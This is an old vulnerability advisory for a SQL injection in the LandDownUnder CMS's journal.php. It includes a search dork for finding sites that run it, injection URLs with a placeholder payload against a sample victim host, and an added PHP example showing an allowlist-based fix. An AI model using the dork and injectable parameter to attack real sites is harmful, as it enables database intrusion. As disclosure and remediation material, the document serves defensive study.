securityvulns SECURITYVULNS:DOC:15523
Dec 30, 2006 - 12:00 a.m.

LDU <= 8.x (journal.php) SQL Injection Vulnerability


BhhGroup.Org & Trtekforum.com

#Found By : St@rExT

script name : LandDownUnder [LDU]

#Version : All

#Dork : "Powered by LDU"

Script sites : http://www.neocrome.net

#Vuln name : LDU <= 8.x (journal.php) SQL Injection Vulnerability

Vulnerable file : Journal.inc.php

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w

#[SQL Vuln.] :

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]
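
The query quoted above builds its `ORDER BY` clause from the `s` and `w` request parameters. The PHP below is an added example, not LDU code and not part of the advisory: it maps both values onto fixed allowlists and binds the remaining values as parameters. The `journals` table, the `jrn_username` and `jrn_date` columns, the function names and the sample rows are assumptions made for illustration.

```php
<?php
// Added example, not LDU source. Only jrn_userid, jrn_minlevel and the jrn_
// prefix come from the advisory; everything else is assumed for illustration.

// ORDER BY identifiers and direction cannot be bound as parameters,
// so request values are mapped onto fixed, server-side strings.
const SORT_COLUMNS = [            // assumed set of sortable fields
    'username' => 'jrn_username',
    'date'     => 'jrn_date',
];
const SORT_DIRECTIONS = ['asc' => 'ASC', 'desc' => 'DESC'];

function journal_order_clause(?string $s, ?string $w): string
{
    // Anything not in the allowlists falls back to a safe default.
    $col = SORT_COLUMNS[$s ?? ''] ?? 'jrn_date';
    $dir = SORT_DIRECTIONS[strtolower($w ?? '')] ?? 'DESC';
    return "ORDER BY $col $dir";
}

function fetch_journals(PDO $db, int $userId, int $level, ?string $s, ?string $w): array
{
    // Values are bound; only allowlisted text is concatenated into the SQL.
    $sql = 'SELECT * FROM journals WHERE jrn_userid = :uid AND jrn_minlevel <= :lvl '
         . journal_order_clause($s, $w);
    $st = $db->prepare($sql);
    $st->execute([':uid' => $userId, ':lvl' => $level]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE journals (jrn_userid INT, jrn_minlevel INT, jrn_username TEXT, jrn_date INT)');
$db->exec("INSERT INTO journals VALUES (1, 0, 'bob', 200), (1, 0, 'alice', 100), (1, 50, 'carol', 300)");

// Expected request shape: sort by username, ascending.
$rows = fetch_journals($db, 1, 10, 'username', 'asc');
echo implode(',', array_column($rows, 'jrn_username')), "\n";

// An unrecognized direction never reaches the SQL text; the default is used.
$rows = fetch_journals($db, 1, 10, 'username', 'asc, anything else');
echo implode(',', array_column($rows, 'jrn_username')), "\n";
```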

#Contact: [email protected]

              ######## - I wish all Muslims a happy Bayram.. : ) - #####

################### - How happy is the one who says "I am a Turk" - ###################